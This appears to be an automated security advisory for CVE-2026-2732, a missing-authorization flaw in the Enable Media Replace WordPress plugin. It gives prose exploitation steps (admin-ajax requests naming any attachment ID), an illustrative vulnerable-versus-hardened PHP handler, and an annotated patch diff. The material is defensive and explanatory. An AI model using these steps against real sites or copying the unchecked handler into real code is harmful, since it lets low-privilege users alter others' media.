Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2732: Enable Media Replace <= 4.1.7 – Improper Authorization to Authenticated (Author+) Arbitrary Attachment Change via Background Replace (enable-media-replace)

CVE ID: CVE-2026-2732
Severity: Medium (CVSS 5.4)
CWE: CWE-862 (Missing Authorization)
Vulnerable Version: 4.1.7
Patched Version: 4.1.8
Disclosed: March 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2732:
The vulnerability exists in the Enable Media Replace WordPress plugin in versions up to and including 4.1.7. The root cause is a missing authorization check in the RemoveBackgroundViewController::load function. This function handles background removal requests but never verifies that the current user is allowed to modify the target attachment. The vulnerable code path begins when an authenticated user with Author-level access or higher sends a POST request to the WordPress admin-ajax.php endpoint with action 'emr_remove_background_load' and an attachment_id parameter. The load function at line 37 of RemoveBackgroundViewController.php converts attachment_id to an integer via intval($_REQUEST['attachment_id']) and retrieves the post object via get_post(). No ownership or capability check on that attachment occurs before this point, so the caller can name any attachment ID in the system.

The exploitation method requires an attacker with at least Author-level WordPress privileges. They craft a POST request to /wp-admin/admin-ajax.php with action=emr_remove_background_load and attachment_id set to the ID of any media attachment, regardless of ownership. The plugin processes this request and returns the background removal interface for the specified attachment. The attacker can then submit a second request to the emr_remove_background_replace action with ID parameter set to the target attachment ID and a valid removal key. This replaces the original attachment file with a background-removed version, effectively modifying media they do not own.

The patch adds proper authorization checks in two locations within RemoveBackgroundViewController.php. At line 40, after retrieving the attachment post object, the patch inserts a call to emr()->checkImagePermission($attachment). This function verifies the current user has permission to modify the attachment based on authorship. A similar check appears at line 94 in the same file for the replace operation. The patch also modifies the plugin initialization in emr-plugin.php, changing the runtime hook from plugins_loaded to init to ensure user authentication data is available. If exploited, this vulnerability allows authors to modify any media attachment on the site, potentially defacing content, removing important visual elements, or disrupting media-dependent functionality.
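The pattern the three paragraphs above describe, an admin-ajax handler that checks identity but not ownership of the specific attachment, next to a hardened version that mirrors what the patch does, as an added example. This is not the plugin's code: the function names, the `example_remove_background_load` action name and the nonce name are assumptions, and where the patch calls the plugin's own emr()->checkImagePermission() helper this example uses WordPress's built-in `edit_post` meta capability as the authorship test (core maps it to edit_posts for the author's own items and edit_others_posts for anyone else's, which is the rule the advisory describes).

```php
<?php
// Added example, not the Enable Media Replace plugin's code. Names prefixed
// "example_" are assumptions made for illustration.

// --- Vulnerable shape. admin-ajax only routes wp_ajax_* actions to logged-in
// users, so identity is established, but nothing ties the caller to the
// attachment they name: any Author can target any attachment ID.
function example_vulnerable_load() {
    $attachment_id = intval( $_REQUEST['attachment_id'] ?? 0 );
    $attachment    = get_post( $attachment_id );
    // ...render the replacement UI for $attachment without checking that the
    // current user may edit this particular post.
    wp_send_json_success( array( 'attachment' => $attachment_id ) );
}

// --- Hardened shape: deny by default, then an ownership-aware capability test.
function example_user_can_modify_attachment( $attachment ) {
    if ( ! $attachment instanceof WP_Post || 'attachment' !== $attachment->post_type ) {
        return false; // nonexistent ID, or not a media item
    }
    // 'edit_post' is a meta capability: WordPress resolves it to edit_posts for
    // the author's own items and to edit_others_posts for other users' items,
    // so an Author passes only for attachments they own; Editors and
    // Administrators pass for any attachment.
    return current_user_can( 'edit_post', $attachment->ID );
}

function example_hardened_load() {
    // The request must carry a nonce minted on a page this plugin rendered.
    check_ajax_referer( 'example_remove_background', 'nonce' );

    $attachment_id = intval( $_REQUEST['attachment_id'] ?? 0 );
    $attachment    = get_post( $attachment_id );

    if ( ! example_user_can_modify_attachment( $attachment ) ) {
        // 403 with a JSON body: the same shape the plugin's AJAX client expects
        // for errors, and a clear signal in access logs for detection.
        wp_send_json_error( array( 'message' => 'Not allowed to modify this attachment.' ), 403 );
    }
    wp_send_json_success( array( 'attachment' => $attachment_id ) );
}

// Register from init rather than plugins_loaded, as the patch does, so the
// current user is established before any capability check runs. No
// wp_ajax_nopriv_ counterpart is registered, so anonymous callers get no route.
add_action( 'init', function () {
    add_action( 'wp_ajax_example_remove_background_load', 'example_hardened_load' );
} );
```

The same check belongs in front of the replace step as well (the patch adds it there at line 94), because a key obtained through the load step is otherwise enough to reach the file-replacing code path; putting the ownership test in a single helper and calling it from both handlers keeps the two from drifting apart.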

Differential between vulnerable and patched code

Code Diff
--- a/enable-media-replace/build/shortpixel/filesystem/src/Model/File/FileModel.php
+++ b/enable-media-replace/build/shortpixel/filesystem/src/Model/File/FileModel.php
@@ -193,20 +193,7 @@
     return filemtime($this->fullpath);
   }

-  public function hasBackup()
-  {
-      $directory = $this->getBackupDirectory();
-      if (! $directory)
-        return false;

-      $backupFile =  $directory . $this->getFileName();
-
-      if (file_exists($backupFile) && ! is_dir($backupFile) )
-        return true;
-      else {
-        return false;
-      }
-  }


   /** Returns the Directory Model this file resides in
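Review bot: hasBackup() is deleted outright and nothing in this diff shows a replacement or an updated call site, so any remaining caller in the plugin or in the bundled shortpixel libraries will now fail with an undefined-method error. Either keep a deprecated shim (a method that returns false with a @deprecated note) or confirm in the PR description that no callers remain.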
@@ -521,7 +508,7 @@
      $this->is_virtual = true;

 		 // This filter checks if some supplier will be able to handle the file when needed.
-     $path = apply_filters('shortpixel/image/urltopath', false, $url);
+     $path = apply_filters('shortpixel/image/urltopath', false, $url, $this->getRawFullPath());

 		 if ($path !== false)
      {
--- a/enable-media-replace/build/shortpixel/log/src/DebugItem.php
+++ b/enable-media-replace/build/shortpixel/log/src/DebugItem.php
@@ -32,7 +32,7 @@
         if (is_object($this->message) || is_array($this->message))
         {
           $data[] = $this->message;
-          $this->message = __('[Data]');
+          $this->message = __('[Data]', 'enable-media-replace/');
         }
         if (is_array($data) && count($data) > 0)
         {
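Review bot: the new text domain 'enable-media-replace/' carries a trailing slash, so gettext will look up a domain that is never loaded and the string stays untranslated. Every other string in this diff uses 'enable-media-replace' without the slash; use that here and in the two NoticeModel.php hunks below, which introduce the same slashed domain.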
--- a/enable-media-replace/build/shortpixel/notices/src/NoticeModel.php
+++ b/enable-media-replace/build/shortpixel/notices/src/NoticeModel.php
@@ -274,11 +274,11 @@
     {
       $output .= '<div class="details-wrapper">
       <input type="checkbox" name="detailhider" id="check-' . $id .'">
-      <label for="check-' . $id . '"  class="show-details"><span>' . __('See Details', 'shortpixel-image-optimiser')   . '</span>
+      <label for="check-' . $id . '"  class="show-details"><span>' . __('See Details', 'enable-media-replace/')   . '</span>
       </label>';

       $output .= "<div class='detail-content-wrapper'><p class='detail-content'>" . $this->parseDetails() . "</p></div>";
-      $output .= '<label for="check-' . $id . '" class="hide-details"><span>' . __('Hide Details', 'shortpixel-image-optimiser') . '</span></label>';
+      $output .= '<label for="check-' . $id . '" class="hide-details"><span>' . __('Hide Details', 'enable-media-replace/') . '</span></label>';

       $output .= '</div>'; // detail wrapper

@@ -287,7 +287,7 @@

     if ($this->is_removable)
     {
-			      $output .= '<button type="button" id="button-' . $id . '" class="notice-dismiss" data-dismiss="' . $this->suppress_period . '" ><span class="screen-reader-text">' . __('Dismiss this notice', 'shortpixel-image-optimiser') . '</span></button>';
+			      $output .= '<button type="button" id="button-' . $id . '" class="notice-dismiss" data-dismiss="' . $this->suppress_period . '" ><span class="screen-reader-text">' . __('Dismiss this notice', 'enable-media-replace/') . '</span></button>';

        if (! $this->is_persistent)
        {
--- a/enable-media-replace/classes/Controller/ReplaceController.php
+++ b/enable-media-replace/classes/Controller/ReplaceController.php
@@ -194,8 +194,8 @@
 			do_action('emr/converter/prevent-offload', $this->post_id);
       $target_metadata = wp_generate_attachment_metadata( $this->post_id, $this->targetFile->getFullPath() );
 			do_action('emr/converter/prevent-offload-off', $this->post_id);
-      wp_update_attachment_metadata( $this->post_id, $target_metadata );

+      wp_update_attachment_metadata( $this->post_id, $target_metadata );

 			$Replacer->setTargetMeta($target_metadata);
 			//$this->target_metadata = $metadata;
@@ -248,8 +248,11 @@
           'thumbnails_only' => ($this->replaceType == self::MODE_SEARCHREPLACE) ? false : true,
       );

-			$Replacer->replace($args);
-
+			$doreplace = apply_filters('emr/replace/doreplace', true);
+			if(true === $doreplace){
+				$Replacer->replace($args);
+			}
+
 			// Here Updatedata and a ffew others.
 			$this->updateDate();

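Review bot: 'emr/replace/doreplace' is applied with no context argument, so a filter callback cannot decide per attachment; pass at least the post id, e.g. `apply_filters('emr/replace/doreplace', true, $this->post_id)`. Also, when the filter returns false the code still falls through to `$this->updateDate()` and the rest of the post-replace bookkeeping, which then runs for a file that was never replaced; either return early or state in a comment that the bookkeeping is intended to run regardless.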
--- a/enable-media-replace/classes/ViewController/RemoveBackgroundViewController.php
+++ b/enable-media-replace/classes/ViewController/RemoveBackgroundViewController.php
@@ -37,10 +37,15 @@
 			// wp_die(esc_html__('You do not have permission to upload files.', 'enable-media-replace'));
 	 }

-
 	 $attachment_id = intval($_REQUEST['attachment_id']);
 	 $attachment = get_post($attachment_id);

+	 if (! emr()->checkImagePermission($attachment))
+	 {
+		 $this->viewError(self::ERROR_IMAGE_PERMISSION);
+	   wp_die( esc_html__('You do not have permission to upload files for this author.', 'enable-media-replace') );
+	 }
+
 	 $uiHelper = emr()->uiHelper();
 	 $uiHelper->setPreviewSizes();
 	 $uiHelper->setSourceSizes($attachment_id);
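Review bot: this is the authorization fix for CVE-2026-2732 and it sits in the right place, between get_post() and the first use of $attachment_id. One gap is visible: get_post() returns null for a nonexistent ID, and the hunk does not show whether emr()->checkImagePermission() treats null as denied, so an explicit `if (! $attachment) { wp_die(...); }` before the permission call would make deny-by-default behaviour obvious here. The message 'You do not have permission to upload files for this author.' is the upload wording reused for the background-removal screen; naming the operation would make the denial easier to recognise in logs.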
@@ -77,30 +82,34 @@
 		 if (is_null($key) || strlen($key) == 0)
 		 {
 			 $this->viewError(self::ERROR_KEY);
-			 //wp_die(esc_html__('Error while sending form (no key). Please try again.', 'enable-media-replace'));
 		 }

 		 $post_id = isset($_POST['ID']) ? intval($_POST['ID']) : null; // sanitize, post_id.
 		 if (is_null($post_id)) {
 			 	 $this->viewError(self::ERROR_FORM);
-//		     wp_die(esc_html__('Error in request. Please try again', 'enable-media-replace'));
 		 }

+		 $attachment = get_post($post_id);
+
+		 if (! emr()->checkImagePermission($attachment))
+		 {
+			 $this->viewError(self::ERROR_IMAGE_PERMISSION);
+		   wp_die( esc_html__('You do not have permission to upload files for this author.', 'enable-media-replace') );
+		 }
+
 		 $this->setView($post_id);
 		 $result = $this->replaceBackground($post_id, $key);

 		 if (false === $result->success)
 		 {
 			  $this->view->errorMessage = $result->message;
-				$this->viewError();
+				$this->viewError(self::ERROR_DOWNLOAD_FAILED);
 		 }
 		 elseif (! file_exists($result->image))
 		 {
 			 $this->viewError(self::ERROR_DOWNLOAD_FAILED);
 		 }

-//		 $result = $replacer->replaceWith($result->image, $source->getFileName() , true);
-//$params = array();
 		$replaceController = new ReplaceController($post_id);
 		$sourceFile = $replaceController->getSourceFile();

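Review bot: the permission check on $post_id closes the second half of the issue (the replace step), but the two error paths just above it, `$this->viewError(self::ERROR_KEY)` and `$this->viewError(self::ERROR_FORM)`, have their wp_die() calls removed in this hunk and show no return. Unless viewError() exits on its own, execution continues with a null $post_id into get_post(null), which returns the global $post rather than null. Add an explicit return (or keep the wp_die()) after each viewError() so the permission check always examines the attachment the caller actually named.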
--- a/enable-media-replace/classes/ViewController/UploadViewController.php
+++ b/enable-media-replace/classes/ViewController/UploadViewController.php
@@ -90,6 +90,8 @@
 		{
 			 $this->viewSuccess();
 		}
+
+
 	 }


--- a/enable-media-replace/classes/emr-plugin.php
+++ b/enable-media-replace/classes/emr-plugin.php
@@ -21,7 +21,8 @@

     public function __construct()
     {
-        add_action('plugins_loaded', array($this, 'runtime')); //lowInit, before theme setup!
+        add_action('init', array($this, 'runtime'));
+       // add_action('init', [$this, 'init']);  // init for user authentication, not set on plugins_loaded.
 				add_action('admin_init', array($this, 'adminInit')); // adminInit, after functions.php
     }

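Review bot: moving runtime() from plugins_loaded to init matches the stated rationale (the current user is established by init, so the current_user_can() calls in runtime() become reliable), but the commented-out `add_action('init', [$this, 'init'])` line should be removed rather than left as dead code next to the live hook.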
@@ -29,29 +30,35 @@
     {
          $this->nopriv_plugin_actions();

-        if (EMR_CAPABILITY !== false) {
-            if (is_array(EMR_CAPABILITY)) {
-                $this->general_cap = EMR_CAPABILITY[0];
-                $this->user_cap = EMR_CAPABILITY[1];
-
-                if (! current_user_can($this->general_cap) && ! current_user_can($this->user_cap)) {
-                    return;
-                }
-            } else {
-                $this->general_cap = EMR_CAPABILITY;
-                if (! current_user_can($this->general_cap)) {
-                    return;
-                }
-            }
-        } elseif (! current_user_can('upload_files')) {
-            return;
-        }
-
+         if (EMR_CAPABILITY !== false) {
+          if (is_array(EMR_CAPABILITY)) {
+              $this->general_cap = EMR_CAPABILITY[0];
+              $this->user_cap = EMR_CAPABILITY[1];
+
+              if (! current_user_can($this->general_cap) && ! current_user_can($this->user_cap)) {
+                  return;
+              }
+          } else {
+              $this->general_cap = EMR_CAPABILITY;
+              if (! current_user_can($this->general_cap)) {
+                  return;
+              }
+          }
+      } elseif (false === current_user_can('upload_files')) {
+          return;
+      }
+
 				new Externals();

         $this->plugin_actions(); // init
     }

+    public function init()
+    {
+
+
+    }
+
 		public function adminInit()
 		{
 			$this->features['replace']  = true; // does nothing just for completeness
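Review bot: the capability block is re-indented with no functional change other than `false === current_user_can('upload_files')`, which buries the part of this file that matters (the hook move in the previous hunk) under whitespace noise; whitespace-only changes belong in a separate commit. The new init() method is an empty stub with no registration pointing at it; either remove it or leave a comment saying what it is reserved for.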
@@ -290,11 +297,11 @@
   */
     public function admin_scripts()
     {
-        if (is_rtl()) {
-            wp_register_style('emr_style', plugins_url('css/admin.rtl.css', EMR_ROOT_FILE));
+       if (is_rtl()) {
+            wp_register_style('emr_style', plugins_url('css/rtl/admin.css', EMR_ROOT_FILE));
         } else {
             wp_register_style('emr_style', plugins_url('css/admin.css', EMR_ROOT_FILE));
-        }
+       }

         wp_register_style('emr_edit-attachment', plugins_url('css/edit_attachment.css', EMR_ROOT_FILE));

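Review bot: the RTL stylesheet path changes from css/admin.rtl.css to css/rtl/admin.css, but the diff does not include the file move, so confirm the asset exists at the new path in the built package; otherwise RTL installs enqueue a 404 and lose the admin styling.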
--- a/enable-media-replace/classes/external/upgrader_skin.php
+++ b/enable-media-replace/classes/external/upgrader_skin.php
@@ -1,102 +0,0 @@
-<?php
-
-
-/**
- * Skin class.
- *
- * @since 1.0.0
- *
- * @package Envira_Gallery
- * @author  Envira Team
- */
-class EMR_Envira_Gallery_Skin extends WP_Upgrader_Skin {
-
-	/**
-	 * Primary class constructor.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @param array $args Empty array of args (we will use defaults).
-	 */
-	public function __construct( $args = array() ) {
-
-		parent::__construct();
-
-	}
-
-	/**
-	 * Set the upgrader object and store it as a property in the parent class.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @param object $upgrader The upgrader object (passed by reference).
-	 */
-	public function set_upgrader( &$upgrader ) {
-
-		if ( is_object( $upgrader ) ) {
-			$this->upgrader =& $upgrader;
-		}
-
-	}
-
-	/**
-	 * Set the upgrader result and store it as a property in the parent class.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @param object $result The result of the install process.
-	 */
-	public function set_result( $result ) {
-
-		$this->result = $result;
-
-	}
-
-	/**
-	 * Empty out the header of its HTML content and only check to see if it has
-	 * been performed or not.
-	 *
-	 * @since 1.0.0
-	 */
-	public function header() {}
-
-	/**
-	 * Empty out the footer of its HTML contents.
-	 *
-	 * @since 1.0.0
-	 */
-	public function footer() {}
-
-	/**
-	 * Instead of outputting HTML for errors, json_encode the errors and send them
-	 * back to the Ajax script for processing.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @param array $errors Array of errors with the install process.
-	 */
-	public function error( $errors ) {
-
-		if ( ! empty( $errors ) ) {
-			echo wp_json_encode( array( 'error' => __( 'There was an error installing the addon. Please try again.', 'envira-gallery' ) ) );
-			/* log this for API issues */
-
-			error_log( print_r( $errors, true ) );
-
-			die;
-		}
-
-	}
-
-	/**
-	 * Empty out the feedback method to prevent outputting HTML strings as the install
-	 * is progressing.
-	 *
-	 * @since 1.0.0
-	 *
-	 * @param string $string The feedback string.
-	 * @param array  ...$args The args.
-	 */
-	public function feedback( $string, ...$args ) {}
-
-}
--- a/enable-media-replace/classes/external/upsell_installer.php
+++ b/enable-media-replace/classes/external/upsell_installer.php
@@ -12,27 +12,30 @@
 	if ( ! current_user_can('install_plugins'))
 	{
 		// Send back a response.
-		wp_send_json(array('result'=> false));
+
+		wp_send_json(array('result'=> false, 'message' => 'Install permission issue'));
 		die;
 	}

 	switch($plugin)
 	{
 		 case "envira":
-		    $download_url = 'https://downloads.wordpress.org/plugin/envira-gallery-lite.zip';
+			$download_url = 'https://downloads.wordpress.org/plugin/envira-gallery-lite.zip';
 		 break;
 		 case 'spio':
-		 		$download_url = 'https://downloads.wordpress.org/plugin/shortpixel-image-optimiser.zip';
+			$download_url = 'https://downloads.wordpress.org/plugin/shortpixel-image-optimiser.zip';
 		 break;
 		 case 'spai':
-		 	 $download_url = 'https://downloads.wordpress.org/plugin/shortpixel-adaptive-images.zip';
+			$download_url = 'https://downloads.wordpress.org/plugin/shortpixel-adaptive-images.zip';
+		 break;
+		 case 'fp':
+			$download_url = 'https://downloads.wordpress.org/plugin/fastpixel-website-accelerator.zip';
 		 break;
 	}

 	// Install the addon.
 	if ( ! is_null($download_url ) ) {

-		//$download_url = esc_url_raw( wp_unslash( $_POST['plugin'] ) );
 		global $hook_suffix;

 		// Set the current screen to avoid undefined notices.
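Review bot: $download_url is only assigned inside the switch, so for a $plugin value that matches no case the later `is_null($download_url)` test reads an undefined variable (a warning, and behaviour that depends on PHP's undefined-variable handling). Initialise `$download_url = null;` before the switch and treat an unmatched $plugin as an explicit error. The added 'message' key in the permission-failure response is good; the other failure response in this file should use the same key.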
@@ -42,7 +45,6 @@
 		$method = '';
 		$url    = add_query_arg(
 			array(
-			//	'page' => 'envira-gallery-settings',
 			),
 			admin_url( 'admin.php' )
 		);
@@ -68,10 +70,9 @@

 		// We do not need any extra credentials if we have gotten this far, so let's install the plugin.
 		require_once (ABSPATH . 'wp-admin/includes/class-wp-upgrader.php');
-		require_once (plugin_dir_path( EMR_ROOT_FILE ) . 'classes/external/upgrader_skin.php');

 		// Create the plugin upgrader with our custom skin.
-		$skin      = new EMR_Envira_Gallery_Skin();
+		$skin      = new Automatic_Upgrader_Skin();
 		$installer = new Plugin_Upgrader( $skin );
 		$installer->install( $download_url );

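Review bot: replacing the custom EMR_Envira_Gallery_Skin (deleted above) with core's Automatic_Upgrader_Skin removes the skin's error() override, which emitted a JSON error and wrote the errors to error_log. Automatic_Upgrader_Skin collects messages instead of sending them, so this caller should now check the return value of `$installer->install()` (a WP_Error on failure) or `$skin->get_upgrade_messages()` and report the failure; as written, a failed install falls through to the generic failure response further down with no diagnostic.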
@@ -81,7 +82,7 @@
 		if ( $installer->plugin_info() ) {
 			$plugin_basename = $installer->plugin_info();

-		ob_clean();
+		ob_end_clean();


 			wp_send_json_success( array( 'plugin' => $plugin_basename ) );
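Review bot: ob_end_clean() emits a notice and returns false when no output buffer is active, and whether one is active inside this AJAX handler depends on the host's PHP configuration; guard it with `if ( ob_get_level() ) { ob_end_clean(); }`. The switch from ob_clean() to ob_end_clean() is otherwise right, since the buffer is not needed once the JSON response is sent.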
@@ -91,7 +92,7 @@
 	}

 	// Send back a response.
-	wp_send_json(array('result'=> false));
+	wp_send_json(array('result'=> false, 'download url issue'));
 	die;

 }
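Review bot: `array('result'=> false, 'download url issue')` stores the message under integer key 0, so the JSON comes out as {"result":false,"0":"download url issue"} and a client reading a message field (as the permission branch earlier in this file now provides) gets nothing. Use `'message' => 'download url issue'` for consistency.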
@@ -127,7 +128,10 @@
 			$plugin = 'shortpixel-image-optimiser/wp-shortpixel.php';
 	 break;
 	 case 'spai':
-		 $plugin = 'shortpixel-adaptive-images/short-pixel-ai.php';
+			$plugin = 'shortpixel-adaptive-images/short-pixel-ai.php';
+	 break;
+	 case 'fp':
+			$plugin = 'fastpixel-website-accelerator/fastpixel.php';
 	 break;
 }

--- a/enable-media-replace/classes/external/wp-offload.php
+++ b/enable-media-replace/classes/external/wp-offload.php
@@ -206,16 +206,15 @@
 					 return;
 				}

-
 				$original_path = $item->original_path(); // Original path (non-scaled-)
 				$original_source_path = $item->original_source_path();
 				$path = $item->path();
 				$source_path = $item->source_path();

 				$wp_original = wp_get_original_image_path($post_id, apply_filters( 'emr_unfiltered_get_attached_file', true ));
+
 				$wp_original = apply_filters('emr/replace/original_image_path', $wp_original, $post_id);
 				$wp_source = trim(get_attached_file($post_id, apply_filters( 'emr_unfiltered_get_attached_file', true )));
-
 				$updated = false;

 				// If image is replaced with another name, the original soruce path will not match.  This could also happen when an image is with -scaled as main is replaced by an image that doesn't have it.  In all cases update the table to reflect proper changes.
@@ -232,6 +231,7 @@
 					 $item->set_original_source_path($newpath);

 					 $item->save();
+
 				}
 		}

--- a/enable-media-replace/enable-media-replace.php
+++ b/enable-media-replace/enable-media-replace.php
@@ -3,7 +3,7 @@
  * Plugin Name: Enable Media Replace
  * Plugin URI: https://shortpixel.com
  * Description: Enable replacing media files by uploading a new file in the "Edit Media" section of the WordPress Media Library.
- * Version: 4.1.7
+ * Version: 4.1.8
  * Author: ShortPixel
  * Author URI: https://shortpixel.com
  * GitHub Plugin URI: https://github.com/short-pixel-optimizer/enable-media-replace
@@ -25,24 +25,17 @@
  *
  */

-define( 'EMR_VERSION', '4.1.7' );
+define( 'EMR_VERSION', '4.1.8' );

 if ( ! defined( 'ABSPATH' ) ) {
 	exit; // Exit if accessed directly.
 }

-/* Not sure why we define this?
-if(!defined("S3_UPLOADS_AUTOENABLE")) {
-	define('S3_UPLOADS_AUTOENABLE', true);
-} */

 if ( ! defined( 'EMR_ROOT_FILE' ) ) {
 	  define( 'EMR_ROOT_FILE', __FILE__ );
 }

-if ( ! defined( 'SHORTPIXEL_AFFILIATE_CODE' ) ) {
-	define( 'SHORTPIXEL_AFFILIATE_CODE', 'VKG6LYN28044' );
-}

 /** Usage:
 * Define in wp-config.php
--- a/enable-media-replace/views/success.php
+++ b/enable-media-replace/views/success.php
@@ -18,9 +18,11 @@

 	<p><?php _e('Your image has been successfully replaced!', 'enable-media-replace'); ?></p>

-	<p><?php _e('Did you know that you can also optimize the images on your website to make them load faster?', 'enable-media-replace'); ?></p>
+	<?php if (apply_filters('emr/upsell', current_user_can('install_plugins'))) { ?>
+		<p><?php _e('Did you know that you can also optimize the images on your website to make them load faster?', 'enable-media-replace'); ?></p>

-	<p><?php printf(esc_html__('Try the %sShortPixel Image Optimizer%s plugin!', 'enable-media-replace'), '<a href="https://wordpress.org/plugins/shortpixel-image-optimiser/" target="_blank">', '</a>'); ?></p>
+		<p><?php printf(esc_html__('Try the %sShortPixel Image Optimizer%s plugin!', 'enable-media-replace'), '<a href="https://wordpress.org/plugins/shortpixel-image-optimiser/" target="_blank">', '</a>'); ?></p>
+	<?php } ?>

 	<p><?php _e('You will be redirect to the image screen in a few seconds.', 'enable-media-replace');
 		printf(esc_html__('( %s ) or %s click here to continue %s', 'enable-media-replace'), '<span id="redirect_counter"></span>',
--- a/enable-media-replace/views/upsell.php
+++ b/enable-media-replace/views/upsell.php
@@ -20,6 +20,9 @@
 	$spai_installed = isset($plugins['shortpixel-adaptive-images/short-pixel-ai.php']);
 	$spai_active = is_plugin_active('shortpixel-adaptive-images/short-pixel-ai.php');

+	$fp_installed = isset($plugins['fastpixel-website-accelerator/fastpixel.php']);
+	$fp_active = is_plugin_active('fastpixel-website-accelerator/fastpixel.php');
+
 	$envira_installed = isset($plugins['envira-gallery-lite/envira-gallery-lite.php']);
 	$envira_active = is_plugin_active('envira-gallery-lite/envira-gallery-lite.php');
 	$envira_pro_active = is_plugin_active('envira-gallery/envira-gallery.php');
@@ -39,11 +42,13 @@
           <img width="40" height="40" src="<?php echo emr()->getPluginURL('img/sp-logo-regular.svg') ?>" alt="ShortPixel">
       </div>
 			<h4 class="grey">
-		     <?php echo esc_html__("ShortPixel Image Optimizer", "enable-media-replace"); ?>
+		    <?php echo esc_html__("ShortPixel Image Optimizer", "enable-media-replace"); ?>
 			 </h4>
-			<h3 class="red ucase"><?php _e('Is your website slow?', 'enable-media-replace'); ?></h3>
-			<br>
-			<h3 class="cyan ucase"><?php printf(__('Optimize all images %s automatically', 'enable-media-replace'), '<br>'); ?></h3>
+			<h3 class="cyan ucase"><?php _e('Unlimited Image Optimizations', 'enable-media-replace'); ?></h3>
+			</br>
+			<h3 class="cyan ucase"><?php _e('Unlimited AI Captioning', 'enable-media-replace'); ?></h3>
+			</br>
+			<h3 class="cyan ucase"><?php _e('Unlimited Background removal', 'enable-media-replace'); ?></h3>
       <p class='button-wrapper '>
 			<?php
 			  $install_class = (! $spio_installed) ? '' : 'hidden';
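Review bot: `</br>` is not valid HTML (br has no closing tag); browsers tolerate it, but it should be `<br>` as in the line being removed. With three stacked h3 headings for one offer, a list or paragraph markup would also read better than heading elements used for spacing.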
@@ -64,7 +69,42 @@
 	<?php endif; ?>
 	<!--- // SHORTPIXEL -->

-		<!--- SHORTPIXEL AI -->
+
+		<!--- FASTPIXEL -->
+    <?php if(! $fp_active): ?>
+
+    <div class='shortpixel-offer fp'>
+      <div class='img-wrapper'>
+          <img width="150" height="" src="<?php echo esc_url(emr()->getPluginURL('img/fastpixel-logo.svg')) ?>" alt="FastPixel">
+      </div>
+			<h4 class="grey">
+		     <?php echo esc_html__("FastPixel Website Accelerator", "enable-media-replace"); ?>
+			 </h4>
+
+
+			<h3 class="cyan ucase"><?php printf(__('Faster WordPress', 'enable-media-replace')); ?></h3>
+			<h3 class="red ucase"><?php _e('Made Easy', 'enable-media-replace'); ?></h3>
+      <p class='button-wrapper '>
+			<?php
+			  $install_class = (! $fp_installed) ? '' : 'hidden';
+				$activate_class = ($fp_installed && ! $fp_active) ? '' : 'hidden';
+			?>
+					<a class="emr-installer <?php echo $install_class ?>"  data-action="install" data-plugin="fp" href="javascript:void(0)">
+						<?php _e('INSTALL NOW', 'enable-media-replace') ?>
+					</a>
+
+				<a class='emr-activate <?php echo $activate_class ?>' data-action="activate" data-plugin="fp" href="javascript:void(0)">
+					<?php _e('ACTIVATE', 'enable-media-replace') ?>
+				</a>
+
+				<h4 class='emr-activate-done hidden' data-plugin='fp'><?php _e('FastPixel activated!', 'enable-media-replace'); ?></h4>
+			</p>
+
+    </div>
+	<?php endif; ?>
+	<!--- // FASTPIXEL -->
+
+		<!--- SHORTPIXEL AI
     <?php if(! $spai_active): ?>

     <div class='shortpixel-offer spai'>
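Review bot: the SHORTPIXEL AI block is disabled by turning its opening marker into an unterminated HTML comment (`<!--- SHORTPIXEL AI`) that is only closed by the `<!--- // SHORTPIXEL AI -->` marker further down. The PHP inside still executes and the markup is still sent to the browser, merely hidden, and any `-->` (or `--` inside an attribute) within the block would end the comment early and expose it. Wrap the block in `<?php /* ... */ ?>` or delete it, as the last hunk of this file does for the older offers. In the new FastPixel block, `printf(__('Faster WordPress', 'enable-media-replace'))` passes a translatable string as a printf format with no arguments; use `_e()` like the neighbouring heading.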
@@ -98,73 +138,4 @@
 	<?php endif; ?>
 	<!--- // SHORTPIXEL AI -->

-  <!--- Shortpixel THEME -->
-	<div class='shortpixel-offer theme-offer'>
-		<p><a href="https://wordpress.org/themes/superb-pixels/" target="_blank"><img src="<?php echo esc_url(emr()->getPluginURL('img/sp-banner-theme.jpg')); ?>" alt='ShortPixel Theme' ></a></p>
-
-	</div>
-	<!--- // Shortpixel THEME -->
-
-	<!--- WPSO -->
-	<?php /*
-    <div class='shortpixel-offer site-speed'>
-      <p class='img-wrapper'><img width="40" height="40" src="<?php echo emr()->getPluginURL('img/sp-logo-wink.svg'); ?>" alt='ShortPixel'></p>
-      <h3><?php printf(__('GET AN ASSESSMENT FOR %s YOUR WEBSITE %s AND %s %s FIND OUT HOW TO MAKE IT FASTER %s', 'enable-media-replace'),'<br>', '<br>','<br>', '<span class="red">','</span>'); ?></h3>
-
-      <p class='button-wrapper'><a href='https://wso.shortpixel.com/?utm_source=EMR' target="_blank"><?php _e('FIND OUT MORE', 'enable-media-replace') ?></a></p>
-    </div>
-*/ ?>
-	<!--- // WPSO -->
-
-
-
-		<!--- ENVIRA temprary deactivated
-		<?php if (! $envira_pro_active): ?>
-  <div class='envira-shortpixel-install shortpixel-offer'>
-
-	<p class='img-wrapper'><img src="<?php echo emr()->getPluginURL('img/envira-logo.png'); ?>" alt='Envira Gallery'></p>
-	<p><?php esc_html_e('Create beautiful, fast-loading photo & video galleries for your site in minutes.', 'enable-media-replace' ); ?></p>
-
-		 <?php
-			  $install_class = (! $envira_installed) ? '' : 'hidden';
-				$activate_class = ($envira_installed && ! $envira_active) ? '' : 'hidden';
-		 ?>
-		 <?php if (! $envira_active) { ?>
-	   <p class='button-wrapper envira-emr-button-wrap'>
-
-			 <a class="emr-installer button button-envira-emr emr-install-envira <?php echo $install_class ?>"  data-action="install" data-plugin="envira" href='javascript:void(0)'><?php _e('Install now', 'enable-media-replace') ?></a>
-
-			 <a class="emr-activate button button-envira-emr emr-activate-envira <?php echo $activate_class ?>" href='javascript:void(0)' data-action="activate" data-plugin="envira" ><?php _e('Activate', 'enable-media-replace') ?></a>
-
-				<h4 class='emr-activate-done hidden' data-plugin='envira'><?php _e('Envira Gallery activated!', 'enable-media-replace'); ?></h4>
-
-		</p>
-
-		<?php } else {
-				if ( is_plugin_active( 'envira-gallery-lite/envira-gallery-lite.php' ) ) {
-			?>
-				<p class='button-wrapper envira-emr-button-wrap'><a class="button button-envira-emr" href='https://enviragallery.com/pricing' target="_blank"><?php _e('Get Pro', 'enable-media-replace') ?></a></p>
-
